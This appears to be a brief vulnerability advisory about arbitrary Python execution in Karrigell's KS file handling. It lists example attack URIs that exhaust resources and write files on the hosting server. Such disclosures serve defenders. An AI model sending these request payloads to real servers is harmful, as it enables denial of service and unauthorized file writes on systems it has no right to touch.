Karrigell KS File Arbitrary Python Command Execution Vulnerability

Karrigell KS File Arbitrary Python Command Execution Vulnerability

An exploit is not required. Some example URIs have been provided.

The following examples will cause a denial of service condition:
http://www.example.com/test.ks/raw_input
http://www.example.com/test.ks/file?%22*10000000&mode=w

The following example will create a file on the local filesystem on the hosting computer:
http://www.example.com/test.ks/file?%22*2&mode=w